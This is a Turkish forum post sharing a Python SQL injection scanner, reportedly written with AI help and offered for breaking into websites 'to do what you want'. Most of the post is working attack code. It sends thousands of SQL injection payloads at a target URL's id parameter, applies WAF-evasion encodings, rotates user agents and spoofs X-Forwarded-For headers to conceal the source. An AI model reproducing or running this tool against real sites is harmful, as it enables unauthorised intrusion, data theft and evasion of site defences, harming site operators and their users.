Mertistevip
Gold Üye
- Katılım
- 2 Eki 2025
- Mesajlar
- 420
- Beğeniler
- 90
- İletişim
Kodda aidan yardım lında sql açıklarını bulup ordan istediğinizi yapın siteye isteyen dah fazla method ekleyebılır bi e.s alırım isteyen siber güvenlik içinde kullaanabılır
Python:
import asyncio
import aiohttp
import random
import time
import os
import json
import warnings
import base64
from datetime import datetime
warnings.filterwarnings("ignore", category=DeprecationWarning)
MAX_CONCURRENT = 50
TIMEOUT_SEC = 10
COLORS = {"OK": "\033[92m", "FAIL": "\033[91m", "WARN": "\033[93m", "INFO": "\033[94m", "RESET": "\033[0m"}
class UltimateScanner:
def __init__(self, target_url):
self.target = target_url.strip().rstrip('/')
if not self.target.startswith("http"):
self.target = "https://" + self.target
self.results = []
self.stats = {"total": 0, "vuln": 0, "error": 0}
self.payloads = self.generate_stealth_payloads()
def generate_stealth_payloads(self):
"""WAF Bypass teknikleri ile zenginleştirilmiş payloadlar"""
base = ["'", "''", "';", '"', '";', "') OR 1=1--", "1' ORDER BY 1--", "1' UNION SELECT NULL--"]
expanded = []
for b in base:
expanded.append(b)
expanded.append(b.replace(" ", "/**/"))
expanded.append(b.replace("'", "%27").replace(" ", "%20"))
for i in range(1, 2000):
expanded.append(f"1' ORDER BY {i}--")
expanded.append(f"1' UNION SELECT {','.join(['NULL']*min(i, 20))}--")
return expanded
async def stealth_fetch(self, session, payload):
"""Gizlilik odaklı istek gönderici"""
headers = {
"User-Agent": random.choice([
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/121.0.0.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15",
"Mozilla/5.0 (X11; Linux x86_64) Firefox/122.0"
]),
"X-Forwarded-For": f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
"Referer": "https://www.google.com/"
}
test_url = f"{self.target}/?id={payload}"
self.stats["total"] += 1
curr_id = self.stats["total"]
try:
async with session.get(test_url, headers=headers, timeout=TIMEOUT_SEC, ssl=False, allow_redirects=True) as resp:
text = await resp.text()
status = resp.status
color = COLORS["OK"] if status == 200 else COLORS["WARN"]
print(f"[{curr_id:04}] {color}ATTACKING:{COLORS['RESET']} {payload[:25]:<25} | {color}CODE: {status}{COLORS['RESET']}")
sql_errors = ["sql syntax", "mysql", "postgresql", "oracle", "sqlite", "unexpected end", "native client"]
if any(err in text.lower() for err in sql_errors):
print(f"\n{COLORS['FAIL']}[!!!] KRİTİK ZAFİYET TESPİT EDİLDİ! [!!!]{COLORS['RESET']}")
print(f"{COLORS['FAIL']}[TİP] SQL Injection{COLORS['RESET']}")
print(f"{COLORS['FAIL']}[URL] {test_url}{COLORS['RESET']}\n")
self.results.append({"url": test_url, "type": "SQLi", "time": str(datetime.now())})
self.stats["vuln"] += 1
except Exception:
self.stats["error"] += 1
async def run(self):
os.system('cls' if os.name == 'nt' else 'clear')
print(f"{COLORS['INFO']}=== ORION-X ULTIMATE STEALTH FRAMEWORK ==={COLORS['RESET']}")
print(f"[*] HEDEF SITE: {self.target}")
print(f"[*] PAYLOAD SAYISI: {len(self.payloads)}")
print(f"[*] GİZLİLİK MODU: AKTİF (X-Forwarded-For Spoofing)")
print(f"{'-'*50}\n")
time.sleep(1)
conn = aiohttp.TCPConnector(limit=MAX_CONCURRENT, ssl=False)
async with aiohttp.ClientSession(connector=conn) as session:
tasks = [self.stealth_fetch(session, p) for p in self.payloads]
await asyncio.gather(*tasks)
self.summary()
def summary(self):
print(f"\n{COLORS['INFO']}{'='*50}{COLORS['RESET']}")
print(f"TARAMA SONUÇLARI")
print(f"Toplam Deneme: {self.stats['total']}")
print(f"Bulunan Açık : {self.stats['vuln']}")
print(f"Hatalı/Engelli: {self.stats['error']}")
print(f"Rapor : scan_results.json")
print(f"{COLORS['INFO']}{'='*50}{COLORS['RESET']}")
with open("scan_results.json", "w") as f:
json.dump(self.results, f, indent=4)
async def main():
target = input("Taramak istediğiniz URL: ")
scanner = UltimateScanner(target)
await scanner.run()
if __name__ == "__main__":
try:
asyncio.run(main())
except KeyboardInterrupt:
print("\n[!] Çıkış yapılıyor...")
